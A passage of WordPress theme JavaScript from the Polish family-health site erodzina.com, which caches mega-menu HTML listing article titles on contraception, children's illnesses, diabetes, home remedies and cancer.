href=\"http:\/\/www.erodzina.com\/fundacja-dla-dzieci-chorych-na-nowotwor-do-ktorej-sie-zwrocic\/\" rel=\"bookmark\" title=\"Fundacja dla dzieci chorych na nowotw\u00f3r. Do kt\u00f3rej si\u0119 zwr\u00f3ci\u0107?\">Fundacja dla dzieci chorych na nowotw\u00f3r. Do kt\u00f3rej si\u0119 zwr\u00f3ci\u0107?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-12-13T19:55:22+00:00\" >13 grudnia 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_10_5c5e20b787cdf","td_hide_prev":true,"td_hide_next":false}));
                                            tmpObj = JSON.parse(JSON.stringify(block_td_uid_10_5c5e20b787cdf));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 52;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/zaplanuj-antykoncepcje\/\" rel=\"bookmark\" title=\"Zaplanuj antykoncepcj\u0119\"><img width=\"243\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2015\/11\/antykoncepcja.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2015\/11\/antykoncepcja.jpg 550w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2015\/11\/antykoncepcja-300x241.jpg 300w\" sizes=\"(max-width: 243px) 100vw, 243px\" alt=\"\" title=\"Zaplanuj antykoncepcj\u0119\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/zdrowie-i-opieka\/antykoncepcja\/\" class=\"td-post-category\">Antykoncepcja<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/zaplanuj-antykoncepcje\/\" rel=\"bookmark\" title=\"Zaplanuj antykoncepcj\u0119\">Zaplanuj antykoncepcj\u0119<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2015-11-19T14:44:21+00:00\" >19 listopada 2015<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/bariery-w-stosowaniu-srodkow-antykoncepcyjnych-przez-mlodziez\/\" rel=\"bookmark\" title=\"Bariery w stosowaniu \u015brodk\u00f3w antykoncepcyjnych przez m\u0142odzie\u017c\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/themes\/ionMag\/images\/no-thumb\/td_260x195.png\" alt=\"\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/zdrowie-i-opieka\/antykoncepcja\/\" class=\"td-post-category\">Antykoncepcja<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/bariery-w-stosowaniu-srodkow-antykoncepcyjnych-przez-mlodziez\/\" rel=\"bookmark\" title=\"Bariery w stosowaniu \u015brodk\u00f3w antykoncepcyjnych przez m\u0142odzie\u017c\">Bariery w stosowaniu \u015brodk\u00f3w antykoncepcyjnych przez m\u0142odzie\u017c<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2008-09-12T10:08:53+00:00\" >12 wrze\u015bnia 2008<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/escapelle-8211-antykoncepcja-na-ratunek-w-naglych-przypadkach\/\" rel=\"bookmark\" title=\"Escapelle &#8211; antykoncepcja na ratunek w nag\u0142ych przypadkach\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/themes\/ionMag\/images\/no-thumb\/td_260x195.png\" alt=\"\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/zdrowie-i-opieka\/antykoncepcja\/\" class=\"td-post-category\">Antykoncepcja<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/escapelle-8211-antykoncepcja-na-ratunek-w-naglych-przypadkach\/\" rel=\"bookmark\" title=\"Escapelle &#8211; antykoncepcja na ratunek w nag\u0142ych przypadkach\">Escapelle &#8211; antykoncepcja na ratunek w nag\u0142ych przypadkach<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2008-08-05T15:02:37+00:00\" >5 sierpnia 2008<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_10_5c5e20b787cdf","td_hide_prev":true,"td_hide_next":false}));
                                                    tmpObj = JSON.parse(JSON.stringify(block_td_uid_10_5c5e20b787cdf));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 17;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/rownosc-zdrowia-i-bezpieczenstwo-opieki-medycznej\/\" rel=\"bookmark\" title=\"R\u00f3wno\u015b\u0107 zdrowia i bezpiecze\u0144stwo opieki medycznej\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/themes\/ionMag\/images\/no-thumb\/td_260x195.png\" alt=\"\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/zdrowie-i-opieka\/choroby-dzieciece\/\" class=\"td-post-category\">Choroby dzieci\u0119ce<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/rownosc-zdrowia-i-bezpieczenstwo-opieki-medycznej\/\" rel=\"bookmark\" title=\"R\u00f3wno\u015b\u0107 zdrowia i bezpiecze\u0144stwo opieki medycznej\">R\u00f3wno\u015b\u0107 zdrowia i bezpiecze\u0144stwo opieki medycznej<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2009-04-19T02:52:11+00:00\" >19 kwietnia 2009<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/odra-u-dzieci\/\" rel=\"bookmark\" title=\"Odra u dzieci\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/themes\/ionMag\/images\/no-thumb\/td_260x195.png\" alt=\"\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/zdrowie-i-opieka\/choroby-dzieciece\/\" class=\"td-post-category\">Choroby dzieci\u0119ce<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/odra-u-dzieci\/\" rel=\"bookmark\" title=\"Odra u dzieci\">Odra u dzieci<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2006-03-16T14:59:43+00:00\" >16 marca 2006<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/nadpobudliwosc-to-choroba\/\" rel=\"bookmark\" title=\"Nadpobudliwo\u015b\u0107 to choroba\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/themes\/ionMag\/images\/no-thumb\/td_260x195.png\" alt=\"\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/zdrowie-i-opieka\/choroby-dzieciece\/\" class=\"td-post-category\">Choroby dzieci\u0119ce<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/nadpobudliwosc-to-choroba\/\" rel=\"bookmark\" title=\"Nadpobudliwo\u015b\u0107 to choroba\">Nadpobudliwo\u015b\u0107 to choroba<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2005-11-16T12:49:11+00:00\" >16 listopada 2005<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_10_5c5e20b787cdf","td_hide_prev":true,"td_hide_next":false}));
                                                    tmpObj = JSON.parse(JSON.stringify(block_td_uid_10_5c5e20b787cdf));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 58;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/czwarty-polak-chorujacy-cukrzyce-o-tym-wie\/\" rel=\"bookmark\" title=\"Co czwarty Polak choruj\u0105cy na cukrzyc\u0119 o tym nie wie\"><img width=\"260\" height=\"173\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/06\/badanie-cukru-we-krwi.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/06\/badanie-cukru-we-krwi.jpg 1000w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/06\/badanie-cukru-we-krwi-300x200.jpg 300w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/06\/badanie-cukru-we-krwi-768x512.jpg 768w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/06\/badanie-cukru-we-krwi-127x85.jpg 127w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/06\/badanie-cukru-we-krwi-101x68.jpg 101w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Co czwarty Polak choruj\u0105cy na cukrzyc\u0119 o tym nie wie\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/zdrowie-i-opieka\/cukrzyca\/\" class=\"td-post-category\">Cukrzyca<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/czwarty-polak-chorujacy-cukrzyce-o-tym-wie\/\" rel=\"bookmark\" title=\"Co czwarty Polak choruj\u0105cy na cukrzyc\u0119 o tym nie wie\">Co czwarty Polak choruj\u0105cy na cukrzyc\u0119 o tym nie wie<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2016-06-26T18:28:51+00:00\" >26 czerwca 2016<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/postaw-na-aktywnosc-przeciwdzialaj-cukrzycy\/\" rel=\"bookmark\" title=\"Postaw na aktywno\u015b\u0107, przeciwdzia\u0142aj cukrzycy\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/themes\/ionMag\/images\/no-thumb\/td_260x195.png\" alt=\"\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/zdrowie-i-opieka\/cukrzyca\/\" class=\"td-post-category\">Cukrzyca<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/postaw-na-aktywnosc-przeciwdzialaj-cukrzycy\/\" rel=\"bookmark\" title=\"Postaw na aktywno\u015b\u0107, przeciwdzia\u0142aj cukrzycy\">Postaw na aktywno\u015b\u0107, przeciwdzia\u0142aj cukrzycy<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2009-07-21T16:29:03+00:00\" >21 lipca 2009<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/wybitni-polscy-lekarze-na-rzecz-ciezarnych-z-cukrzyca\/\" rel=\"bookmark\" title=\"Wybitni polscy lekarze na rzecz ci\u0119\u017carnych z cukrzyc\u0105\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/themes\/ionMag\/images\/no-thumb\/td_260x195.png\" alt=\"\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/zdrowie-i-opieka\/cukrzyca\/\" class=\"td-post-category\">Cukrzyca<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/wybitni-polscy-lekarze-na-rzecz-ciezarnych-z-cukrzyca\/\" rel=\"bookmark\" title=\"Wybitni polscy lekarze na rzecz ci\u0119\u017carnych z cukrzyc\u0105\">Wybitni polscy lekarze na rzecz ci\u0119\u017carnych z cukrzyc\u0105<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2008-10-15T00:44:03+00:00\" >15 pa\u017adziernika 2008<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_10_5c5e20b787cdf","td_hide_prev":true,"td_hide_next":false}));
                                                    tmpObj = JSON.parse(JSON.stringify(block_td_uid_10_5c5e20b787cdf));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 20;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/bol-brzucha-8211-nie-zawsze-szkolna-wymowka\/\" rel=\"bookmark\" title=\"B\u00f3l brzucha \u2013 nie zawsze szkolna wym\u00f3wka\"><img width=\"260\" height=\"173\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2010\/02\/erodzina-com-zdrowie.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2010\/02\/erodzina-com-zdrowie.jpg 1280w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2010\/02\/erodzina-com-zdrowie-300x200.jpg 300w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2010\/02\/erodzina-com-zdrowie-768x512.jpg 768w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2010\/02\/erodzina-com-zdrowie-1024x682.jpg 1024w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2010\/02\/erodzina-com-zdrowie-127x85.jpg 127w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2010\/02\/erodzina-com-zdrowie-101x68.jpg 101w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"B\u00f3l brzucha \u2013 nie zawsze szkolna wym\u00f3wka\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/zdrowie-i-opieka\/domowa-apteczka\/\" class=\"td-post-category\">Domowa apteczka<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/bol-brzucha-8211-nie-zawsze-szkolna-wymowka\/\" rel=\"bookmark\" title=\"B\u00f3l brzucha \u2013 nie zawsze szkolna wym\u00f3wka\">B\u00f3l brzucha \u2013 nie zawsze szkolna wym\u00f3wka<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2011-08-03T00:05:56+00:00\" >3 sierpnia 2011<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/dicoman-skuteczny-w-zaparciach-ciezarnych\/\" rel=\"bookmark\" title=\"Dicoman skuteczny w zaparciach ci\u0119\u017carnych\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/themes\/ionMag\/images\/no-thumb\/td_260x195.png\" alt=\"\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/zdrowie-i-opieka\/domowa-apteczka\/\" class=\"td-post-category\">Domowa apteczka<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/dicoman-skuteczny-w-zaparciach-ciezarnych\/\" rel=\"bookmark\" title=\"Dicoman skuteczny w zaparciach ci\u0119\u017carnych\">Dicoman skuteczny w zaparciach ci\u0119\u017carnych<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2009-03-09T19:10:11+00:00\" >9 marca 2009<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/zelazo-dla-kobiet-w-ciazy\/\" rel=\"bookmark\" title=\"\u017belazo dla kobiet w ci\u0105\u017cy\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2008\/07\/chela_ferr-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2008\/07\/chela_ferr-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2008\/07\/chela_ferr-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2008\/07\/chela_ferr-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"\u017belazo dla kobiet w ci\u0105\u017cy\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/zdrowie-i-opieka\/domowa-apteczka\/\" class=\"td-post-category\">Domowa apteczka<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/zelazo-dla-kobiet-w-ciazy\/\" rel=\"bookmark\" title=\"\u017belazo dla kobiet w ci\u0105\u017cy\">\u017belazo dla kobiet w ci\u0105\u017cy<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2008-07-14T21:34:08+00:00\" >14 lipca 2008<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_10_5c5e20b787cdf","td_hide_prev":true,"td_hide_next":false}));
                                                    tmpObj = JSON.parse(JSON.stringify(block_td_uid_10_5c5e20b787cdf));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 98;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/biala-szalwia-oczyszczac-biala-szalwia\/\" rel=\"bookmark\" title=\"Bia\u0142a Sza\u0142wia Jak oczyszcza\u0107 bia\u0142\u0105 sza\u0142wi\u0105\"><img width=\"260\" height=\"146\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/04\/biala-szalwia-jak-oczyszczac-bia.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/04\/biala-szalwia-jak-oczyszczac-bia.jpg 1280w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/04\/biala-szalwia-jak-oczyszczac-bia-300x169.jpg 300w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/04\/biala-szalwia-jak-oczyszczac-bia-768x432.jpg 768w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/04\/biala-szalwia-jak-oczyszczac-bia-1024x576.jpg 1024w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/04\/biala-szalwia-jak-oczyszczac-bia-860x484.jpg 860w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Bia\u0142a Sza\u0142wia Jak oczyszcza\u0107 bia\u0142\u0105 sza\u0142wi\u0105\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/zdrowie-i-opieka\/medycyna-alternatywna\/\" class=\"td-post-category\">Medycyna alternatywna<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/biala-szalwia-oczyszczac-biala-szalwia\/\" rel=\"bookmark\" title=\"Bia\u0142a Sza\u0142wia Jak oczyszcza\u0107 bia\u0142\u0105 sza\u0142wi\u0105\">Bia\u0142a Sza\u0142wia Jak oczyszcza\u0107 bia\u0142\u0105 sza\u0142wi\u0105<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2016-04-14T20:12:07+00:00\" >14 kwietnia 2016<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_10_5c5e20b787cdf","td_hide_prev":true,"td_hide_next":true}));
                                                    tmpObj = JSON.parse(JSON.stringify(block_td_uid_10_5c5e20b787cdf));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 23;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/fundacja-dla-dzieci-chorych-na-nowotwor-do-ktorej-sie-zwrocic\/\" rel=\"bookmark\" title=\"Fundacja dla dzieci chorych na nowotw\u00f3r. Do kt\u00f3rej si\u0119 zwr\u00f3ci\u0107?\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/walka_z_rakiem-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/walka_z_rakiem-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/walka_z_rakiem-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/walka_z_rakiem-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Fundacja dla dzieci chorych na nowotw\u00f3r. Do kt\u00f3rej si\u0119 zwr\u00f3ci\u0107?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/zdrowie-i-opieka\/rak\/\" class=\"td-post-category\">Rak<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/fundacja-dla-dzieci-chorych-na-nowotwor-do-ktorej-sie-zwrocic\/\" rel=\"bookmark\" title=\"Fundacja dla dzieci chorych na nowotw\u00f3r. Do kt\u00f3rej si\u0119 zwr\u00f3ci\u0107?\">Fundacja dla dzieci chorych na nowotw\u00f3r. Do kt\u00f3rej si\u0119 zwr\u00f3ci\u0107?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-12-13T19:55:22+00:00\" >13 grudnia 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/rak-zoladka-typy-morfologiczne-i-klasyfikacje\/\" rel=\"bookmark\" title=\"Rak \u017co\u0142\u0105dka \u2013 typy morfologiczne i klasyfikacje\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/03\/1-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/03\/1-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/03\/1-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/03\/1-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Rak \u017co\u0142\u0105dka \u2013 typy morfologiczne i klasyfikacje\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/zdrowie-i-opieka\/rak\/\" class=\"td-post-category\">Rak<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/rak-zoladka-typy-morfologiczne-i-klasyfikacje\/\" rel=\"bookmark\" title=\"Rak \u017co\u0142\u0105dka \u2013 typy morfologiczne i klasyfikacje\">Rak \u017co\u0142\u0105dka \u2013 typy morfologiczne i klasyfikacje<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-03-23T11:42:52+00:00\" >23 marca 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/ochrona-nowotworowa-dzieki-badaniom-genetycznym\/\" rel=\"bookmark\" title=\"Ochrona nowotworowa dzi\u0119ki badaniom genetycznym\"><img width=\"255\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/11\/badania-genetyczne_dna.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/11\/badania-genetyczne_dna.jpg 850w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/11\/badania-genetyczne_dna-300x229.jpg 300w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/11\/badania-genetyczne_dna-768x587.jpg 768w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2016\/11\/badania-genetyczne_dna-267x205.jpg 267w\" sizes=\"(max-width: 255px) 100vw, 255px\" alt=\"\" title=\"Ochrona nowotworowa dzi\u0119ki badaniom genetycznym\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/zdrowie-i-opieka\/rak\/\" class=\"td-post-category\">Rak<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/ochrona-nowotworowa-dzieki-badaniom-genetycznym\/\" rel=\"bookmark\" title=\"Ochrona nowotworowa dzi\u0119ki badaniom genetycznym\">Ochrona nowotworowa dzi\u0119ki badaniom genetycznym<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2016-11-02T16:30:46+00:00\" >2 listopada 2016<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        